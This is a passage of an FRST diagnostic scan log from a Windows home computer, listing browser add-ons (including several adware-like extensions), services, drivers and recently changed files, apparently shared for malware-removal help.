BHO-x32: PasswordBox Helper -> {5DB69B97-934B-451D-94DB-32EF802A01CD} -> C:\Program Files (x86)\PasswordBox\Application\pbbtn.dll (PasswordBox, Inc.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\Alwil Software\Avast5\aswWebRepIE.dll (AVAST Software)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Related Searches -> {96A25A24-2E87-4374-8A50-CC6F943FCE4D} -> C:\Users\Papa\AppData\Roaming\DefaultTab\DefaultTab\Apps\RelatedLinksBHO.dll No File
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Skype Browser Helper -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Bing Bar BHO -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2291.0\npwinext.dll (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: SmartBar Helper Object -> {FD36FEBE-DBA1-4597-9DD1-B13794B92F68} -> C:\Program Files (x86)\Bechiro S.L\smartbar\1.8.8.12\bh\smartbar.dll (Montera Technologeis LTD)
BHO-x32: SingleInstance Class -> {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} -> C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\YTSingleInstance.dll (Yahoo! Inc)
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  No File
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - @C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2291.0\npwinext.dll,-100 - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2291.0\npwinext.dll (Microsoft Corporation)
Toolbar: HKLM-x32 - PasswordBox - {25E2E5C9-C43C-4EE8-B23E-4383915F2BCE} - C:\Program Files (x86)\PasswordBox\Application\pbbtn.dll (PasswordBox, Inc.)
Toolbar: HKLM-x32 - Related Searches - {96A25A24-2E87-4374-8A50-CC6F943FCE4D} - C:\Users\Papa\AppData\Roaming\DefaultTab\DefaultTab\Apps\RelatedLinksBHO.dll No File
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKCU - No Name - {25E2E5C9-C43C-4EE8-B23E-4383915F2BCE} -  No File
DPF: HKLM-x32 {4871A87A-BFDD-4106-8153-FFDE2BAC2967} http://dlm.tools.aka...vex-2.2.5.7.cab
Handler: haufereader - No CLSID Value - 
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
Handler-x32: haufereader - No CLSID Value - 
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
Filter: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{17D9B602-7FC4-4529-A557-E1456C40D5AF}: [NameServer]8.8.8.8,8.8.4.4
 
FireFox:
========
FF ProfilePath: C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default
FF DefaultSearchEngine: Search
FF SearchEngineOrder.1: Search
FF SelectedSearchEngine: Google
FF Homepage: hxxp://www.n-tv.de/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_11_8_800_94.dll ()
FF Plugin: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_8_800_94.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1210150.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF Plugin-x32: @soe.sony.com/installer,version=1.0.3 -> C:\Users\PhanCo.FAMILIE-LE-NB\AppData\LocalLow\Sony Online Entertainment\npsoe.dll ()
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Temp\Rar$EXa0.497\LienMinhHuyenThoai\GameData\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @unity3d.com/UnityPlayer,version=1.0 -> C:\Program Files (x86)\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF Plugin-x32: @zing.vn/ZingPlay-WebControl-1,version=1.0.1 -> C:\Program Files\VinaGame\ZingPlay\npWebActivater.dll (VNG Corp.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin HKCU: pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\CCMSDK.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\cgpcfg.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\CgpCore.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\confmgr.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\ctxlogging.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\ctxmui.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\icafile.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\icalogon.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npicaN.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin6.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin7.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPSWF32.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\sslsdk_b.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\TcpPServ.dll (Citrix Systems, Inc.)
FF SearchPlugin: C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\searchplugins\passwordbox.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\amazondotcom-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\eBay-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\leo_ende_de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\yahoo-de.xml
FF Extension: savenshAriE  - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] [2014-03-24]
FF Extension: SearchNewTab - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] [2014-03-24]
FF Extension: Soearachh-NewTiaabi - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] [2014-03-24]
FF Extension: contaiynuettosaovve - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] [2014-03-24]
FF Extension: greaTsavear - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected] [2014-03-24]
FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A} [2012-06-06]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} [2011-11-15]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBA} [2012-05-17]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-06-14]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2012-10-28]
FF HKLM-x32\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF Extension: Default Manager - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension [2012-02-22]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Alwil Software\Avast5\WebRep\FF
FF Extension: avast! Online Security - C:\Program Files\Alwil Software\Avast5\WebRep\FF [2011-06-09]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Extensions\MozillaHotfix
FF Extension: Mozilla hotfix - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Extensions\MozillaHotfix [2013-05-07]
FF HKCU\...\Firefox\Extensions: [[email protected]] - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Extensions\MozillaHotfix
FF HKCU\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\PasswordBox\Firefox
FF Extension: PasswordBox - C:\Program Files (x86)\PasswordBox\Firefox [2013-09-10]
FF HKCU\...\Firefox\Extensions: [[email protected]] - C:\Users\Papa\AppData\Roaming\IDM\idmmzcc5
FF Extension: IDM CC - C:\Users\Papa\AppData\Roaming\IDM\idmmzcc5 [2013-09-15]
FF HKCU\...\SeaMonkey\Extensions: [[email protected]] - C:\Users\Papa\AppData\Roaming\IDM\idmmzcc5
FF Extension: No Name - C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected] []
 
Chrome: 
=======
CHR HomePage: hxxp://www.google.com/
CHR StartupUrls: "hxxp://www.shb.com.vn/"
CHR Extension: (SearchNewTab) - C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\afddldeabjlloeiaejhkcihpbfjbcnca [2013-09-14]
CHR Extension: (No Name) - C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\eooncjejnppfjjklapaamhcdmjbilmde [2013-06-12]
CHR Extension: (No Name) - C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\flcjcajklmlbpmgckpcmnampagbhhmcp [2014-03-29]
CHR Extension: (IDM Integration) - C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmolcgpienlcieaajfkkdamlngancncm [2014-02-01]
CHR Extension: (No Name) - C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc [2013-09-13]
CHR Extension: (greaTsavear) - C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj [2014-01-18]
CHR Extension: (savenshAriE ) - C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngohningfjdmdhlhokngnldcgmnkgldf [2013-09-14]
CHR Extension: (Google Wallet) - C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-13]
CHR Extension: (No Name) - C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\nohfdhapjjlndfgjnmdlcabloeembdkj [2013-06-12]
CHR Extension: (No Name) - C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\pflphaooapbgpeakohlggbpidpppgdff [2014-02-01]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\Alwil Software\Avast5\WebRep\Chrome\aswWebRepChrome.crx [2014-08-12]
CHR HKLM-x32\...\Chrome\Extension: [jmolcgpienlcieaajfkkdamlngancncm] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2013-06-20]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\Skype for Chromium\skype_chrome_extension.crx [2012-10-02]
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
R2 AllShare Framework DMS; C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\AllShareFrameworkManagerDMS.exe [408184 2012-10-23] (Samsung)
R2 AllShare Play Service; C:\Users\Papa\Documents\AllShare Play\AllShare Play Service.exe [662752 2012-12-20] (Copyright 2012 SAMSUNG)
R2 avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [50344 2014-08-12] (AVAST Software)
R2 avast! Firewall; C:\Program Files\Alwil Software\Avast5\afwServ.exe [106488 2014-08-12] (AVAST Software)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
S2 UNS; C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe [2314240 2009-10-01] (Intel Corporation) [File not signed]
S3 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
S2 btwdins; C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe [X]
S2 DefaultTabUpdate; "C:\Users\Papa\AppData\Roaming\DefaultTab\DefaultTab\DTUpdate.exe" [X]
S2 PnkBstrA; C:\Windows\system32\PnkBstrA.exe [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 ArcSec; C:\Windows\System32\drivers\ArcSec.sys [312184 2010-09-21] ()
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29208 2014-08-12] ()
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [28184 2014-08-12] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [79184 2014-08-12] (AVAST Software)
R0 aswNdisFlt; C:\Windows\System32\DRIVERS\aswNdisFlt.sys [448400 2014-08-12] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93568 2014-08-12] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65776 2014-08-12] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1041168 2014-08-12] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [427360 2014-08-12] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [92008 2014-08-12] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [224896 2014-08-12] ()
R2 atksgt; C:\Windows\System32\DRIVERS\atksgt.sys [314016 2013-01-20] ()
R3 clwvd6; C:\Windows\System32\DRIVERS\clwvd6.sys [41704 2013-10-29] (CyberLink Corporation)
S3 hxsyol; C:\AeriaGames\AuraKingdom\avital\hxsy64.sys [86352 2013-11-27] ()
R1 ISODrive; C:\Program Files (x86)\UltraISO\drivers\ISODrv64.sys [115600 2010-01-29] (EZB Systems, Inc.)
R2 lirsgt; C:\Windows\System32\DRIVERS\lirsgt.sys [43680 2013-01-20] ()
S3 massfilter_hs; C:\Windows\System32\drivers\massfilter_hs.sys [12800 2009-02-03] (ZTE Incorporated)
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [868848 2014-01-04] (Duplex Secure Ltd.)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-12 19:04 - 2014-08-12 19:04 - 00036835 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\FRST.txt
2014-08-12 19:03 - 2014-08-12 19:04 - 00000000 ____D () C:\FRST
2014-08-12 19:02 - 2014-08-12 19:03 - 02099712 _____ (Farbar) C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\FRST64.exe
2014-08-12 19:01 - 2014-08-12 19:01 - 00001005 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\AdwCleaner[S0] - Verknüpfung.lnk
2014-08-12 17:52 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-08-12 17:50 - 2014-08-12 17:57 - 00000000 ____D () C:\AdwCleaner
2014-08-12 17:21 - 2014-08-12 17:21 - 01366203 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\AdwCleaner.exe
2014-08-12 16:30 - 2014-08-12 16:30 - 00001987 _____ () C:\Users\Public\Desktop\avast! Internet Security.lnk
2014-08-12 16:30 - 2014-08-12 16:29 - 00028184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2014-08-12 16:29 - 2014-08-12 16:29 - 00448400 _____ (AVAST Software) C:\Windows\system32\Drivers\aswNdisFlt.sys
2014-08-12 16:29 - 2014-08-12 16:29 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2014-08-11 20:39 - 2014-08-11 20:39 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Skype
2014-08-11 20:39 - 2014-08-11 20:39 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2014-08-11 20:35 - 2014-08-11 20:35 - 01677928 _____ (Skype Technologies S.A.) C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\SkypeSetup.exe
2014-08-10 00:50 - 2014-08-10 00:51 - 04161313 _____ () C:\Users\Papa\Downloads\tdsskiller.zip
2014-08-10 00:49 - 2014-08-10 00:49 - 04121952 _____ (Kaspersky Lab ZAO) C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\tdsskiller.exe
2014-08-10 00:32 - 2014-08-10 00:32 - 00000000 ____D () C:\ProgramData\F-Secure
2014-08-10 00:25 - 2014-08-10 00:27 - 05124208 _____ (F-Secure Corporation) C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\F-SecureOnlineScanner-HC.exe
2014-08-09 23:57 - 2014-08-09 23:57 - 00148710 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\Extras.Txt
2014-08-09 23:56 - 2014-08-09 23:56 - 00299540 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\OTL.Txt
2014-08-09 23:56 - 2014-08-09 23:56 - 00000000 ____D () C:\Users\Papa\AppData\Local\Apps\2.0
2014-08-09 22:03 - 2014-08-09 22:03 - 00000000 ____D () C:\Users\Papa\Documents\SimCity
2014-08-09 21:45 - 2014-08-09 21:45 - 00000000 ____D () C:\Users\Papa\AppData\Roaming\install
2014-07-26 23:59 - 2014-07-27 00:11 - 663087765 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\The Forest Setup [Project Antx].exe
2014-07-24 02:43 - 2014-07-24 02:43 - 00000000 ____D () C:\ProgramData\Vodafone
2014-07-19 03:20 - 2014-07-19 03:20 - 00000776 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\The Forest .03 [Project Antix].lnk
2014-07-19 03:19 - 2014-07-02 13:19 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\The Forest .03
2014-07-19 02:32 - 2014-07-19 02:50 - 609442446 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\The Forest .03 Install [P.A].exe
2014-07-18 20:11 - 2014-07-18 20:11 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-07-18 19:12 - 2014-08-09 15:30 - 00002074 _____ () C:\Windows\system32\TeamViewer9_Hooks.log
2014-07-18 18:54 - 2014-07-01 08:56 - 00516096 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-07-18 18:54 - 2014-07-01 08:50 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-07-18 03:16 - 2014-07-18 03:16 - 00000000 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\{50F314EA-8145-4ECC-A520-DE9473BF847C}
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-12 19:04 - 2014-08-12 19:04 - 00036835 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\FRST.txt
2014-08-12 19:04 - 2014-08-12 19:03 - 00000000 ____D () C:\FRST
2014-08-12 19:03 - 2014-08-12 19:02 - 02099712 _____ (Farbar) C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\FRST64.exe
2014-08-12 19:01 - 2014-08-12 19:01 - 00001005 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\AdwCleaner[S0] - Verknüpfung.lnk
2014-08-12 19:01 - 2012-02-22 23:26 - 00000254 _____ () C:\Windows\Tasks\HP Photo Creations Messager.job
2014-08-12 18:36 - 2010-11-16 01:47 - 00000986 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-08-12 18:34 - 2013-12-14 17:24 - 00001028 _____ () C:\Windows\Tasks\CocCocUpdateTaskUserS-1-5-21-4169419405-2626366916-160398126-1007UA.job
2014-08-12 18:08 - 2009-07-14 11:45 - 00010240 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-12 18:08 - 2009-07-14 11:45 - 00010240 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-12 18:04 - 2010-09-18 23:13 - 01684621 _____ () C:\Windows\WindowsUpdate.log
2014-08-12 18:01 - 2014-02-16 17:59 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\NhacCuaTui
2014-08-12 18:01 - 2013-09-13 17:11 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\Tracing
2014-08-12 17:59 - 2013-11-23 13:29 - 00000320 _____ () C:\Windows\Tasks\Start Registry Reviver for FAMILIE-LE-NB@PhanCo(logon).job
2014-08-12 17:59 - 2010-11-16 01:47 - 00000982 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-08-12 17:59 - 2009-07-14 12:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-12 17:59 - 2009-07-14 11:51 - 00177236 _____ () C:\Windows\setupact.log
2014-08-12 17:58 - 2013-09-15 20:09 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\DMCache
2014-08-12 17:58 - 2010-09-18 23:09 - 00284082 _____ () C:\Windows\PFRO.log
2014-08-12 17:57 - 2014-08-12 17:50 - 00000000 ____D () C:\AdwCleaner
2014-08-12 17:57 - 2013-03-28 18:22 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB
2014-08-12 17:57 - 2010-11-14 18:52 - 00000000 ____D () C:\Users\Papa
